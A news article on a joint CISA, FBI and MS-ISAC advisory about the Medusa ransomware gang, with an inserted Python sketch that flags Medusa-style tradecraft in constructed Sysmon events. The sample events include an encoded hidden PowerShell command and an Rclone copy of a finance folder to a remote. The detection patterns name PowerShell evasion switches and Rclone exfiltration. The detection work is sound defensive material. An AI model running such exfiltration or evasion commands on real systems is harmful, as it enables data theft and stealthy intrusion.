The Medusa ransomware gang has infected over 300 organizations across critical sectors, including healthcare, manufacturing, and technology, according to a joint advisory from CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released Wednesday.
Active since 2021, Medusa initially operated as a closed ransomware group but later adopted an affiliate model. The gang uses a double-extortion strategy, encrypting victim data and threatening to leak it unless a ransom is paid. Ransom negotiations remain under the control of the developers, while affiliates execute the attacks.
Medusa actors typically use legitimate remote management tools such as AnyDesk, Atera, and ConnectWise for remote access and lateral movement inside victim networks. They evade detection with “living-off-the-land” (LotL) techniques, including PowerShell commands, and use “bring your own vulnerable driver” (BYOVD) attacks to disable endpoint detection and response (EDR) software, a method that has become common in ransomware operations.
Symantec’s Threat Hunter team reported a 42% increase in Medusa attacks between 2023 and 2024, with the rise continuing in January and February. In one intrusion, the attackers used tools including AVKill and POORTRY to disable security software and exfiltrated data with Rclone. After encrypting systems, the ransomware deleted itself to cover its tracks.
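The tradecraft in the two paragraphs above (RMM tools dropped into user-writable paths, obfuscated PowerShell, vulnerable driver loads, and Rclone exfiltration) maps directly onto host telemetry. The following Python sketch is an added example, not code from the advisory, from Symantec, or from the Medusa operators: it runs simple detection rules over constructed Sysmon-style events. The sample events, the placeholder driver hash, the user-writable path heuristic, and the two-indicator PowerShell threshold are all assumptions for illustration; a real deployment would key the driver rule on Microsoft’s vulnerable driver block list or the LOLDrivers dataset and list the RMM tools the organization actually sanctions.

```python
"""Detection sketch for Medusa-style tradecraft over constructed Sysmon events.

Added example, not code from the CISA/FBI/MS-ISAC advisory or from Symantec.
The events, the placeholder driver hash and the thresholds are constructed.
"""
import re
from dataclasses import dataclass

# Sysmon event IDs used here: 1 = process creation, 6 = driver loaded.
PROCESS_CREATE, DRIVER_LOAD = 1, 6

# Remote management tools named in the advisory, matched case-insensitively
# against the image file name (ScreenConnect is ConnectWise Control's agent).
RMM_PATTERNS = ("anydesk", "atera", "screenconnect", "connectwise")

# Locations a standard user can write to; legitimate RMM installs and
# kernel drivers normally do not run from here (heuristic, an assumption).
USER_WRITABLE = re.compile(r"\\(users|programdata|windows\\temp|temp)\\", re.I)

# PowerShell switches that together point to evasion rather than admin work.
PS_INDICATORS = {
    r"-(e|ec|enc|encodedcommand)\b": "encoded command",
    r"-(w|win|windowstyle)\s+hidden": "hidden window",
    r"-(nop|noprofile)\b": "no profile",
    r"-(ep|executionpolicy)\s+bypass": "policy bypass",
}

# Placeholder block list keyed by SHA-256 (constructed entry). A real deployment
# would load Microsoft's vulnerable driver block list or the LOLDrivers data.
VULN_DRIVER_SHA256 = {"00" * 32: "constructed-example-driver"}


@dataclass
class Finding:
    rule: str
    severity: str
    index: int      # position of the triggering event in the input list
    detail: str


def _check_process(i, ev, sanctioned_rmm):
    image, cmd = ev["image"], ev.get("cmd", "").lower()
    name = image.lower().rsplit("\\", 1)[-1]
    for tool in RMM_PATTERNS:
        if tool in name and tool not in sanctioned_rmm:
            # Same binary from a user-writable directory is far more suspicious.
            sev = "high" if USER_WRITABLE.search(image) else "medium"
            yield Finding("rmm_tool", sev, i, f"{name} from {image}")
    if name in ("powershell.exe", "pwsh.exe"):
        hits = [label for pat, label in PS_INDICATORS.items() if re.search(pat, cmd)]
        if len(hits) >= 2:
            yield Finding("suspicious_powershell", "high", i, ", ".join(hits))
    if name == "rclone.exe" or "rclone" in cmd:
        # An Rclone remote looks like "name:path"; copy/sync/move to one is exfil.
        exfil = re.search(r"\b(copy|sync|move)\b\s+\S+\s+[a-z][\w-]+:", cmd)
        yield Finding("rclone_exfil" if exfil else "rclone_execution",
                      "critical" if exfil else "high", i, ev.get("cmd", ""))


def _check_driver(i, ev):
    image = ev["image"]
    if ev.get("sha256") in VULN_DRIVER_SHA256:
        yield Finding("byovd_known_driver", "critical", i, VULN_DRIVER_SHA256[ev["sha256"]])
    elif USER_WRITABLE.search(image) or not ev.get("signed", True):
        # Not on the list, but a driver staged in Temp or lacking a signature
        # is how BYOVD typically looks before the hash is known.
        yield Finding("byovd_suspicious_driver", "high", i, image)


def detect(events, sanctioned_rmm=frozenset()):
    """Return Findings for Sysmon-style event dicts. sanctioned_rmm names the
    RMM tools the organization actually uses so they are not flagged by name."""
    out = []
    for i, ev in enumerate(events):
        if ev["id"] == PROCESS_CREATE:
            out.extend(_check_process(i, ev, sanctioned_rmm))
        elif ev["id"] == DRIVER_LOAD:
            out.extend(_check_driver(i, ev))
    return out


# Constructed sample telemetry, not real logs.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\svchost.exe", "cmd": "svchost.exe -k netsvcs"},
    {"id": 1, "image": r"C:\Users\Public\AnyDesk.exe",
     "cmd": r"AnyDesk.exe --install C:\Users\Public\ad --silent"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"id": 6, "image": r"C:\Windows\Temp\helper.sys", "signed": True, "sha256": "00" * 32},
    {"id": 1, "image": r"C:\ProgramData\rclone.exe",
     "cmd": r"rclone.exe copy C:\Finance remote:bucket --transfers 32"},
    {"id": 6, "image": r"C:\Windows\System32\drivers\ndis.sys", "signed": True, "sha256": "ab" * 32},
    {"id": 1, "image": r"C:\Program Files\AnyDesk\AnyDesk.exe", "cmd": "AnyDesk.exe --service"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.severity:8}] event {f.index}: {f.rule} ({f.detail})")
```

Because the RMM agents are dual-use, the rule is only useful when paired with an inventory of sanctioned tools and their approved install paths; the sanctioned set suppresses the name match, and the user-writable-path check is what separates an attacker-dropped AnyDesk from the one the helpdesk installed. The driver rule should back a preventive control (a WDAC policy that enforces the vulnerable driver block list), since by the time the load event is logged the EDR it targets may already be gone.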
To counter the threat, CISA, the FBI, and MS-ISAC recommend, among other mitigations, disabling command-line and scripting activities and permissions, since privilege escalation and lateral movement often depend on utilities run from the command line.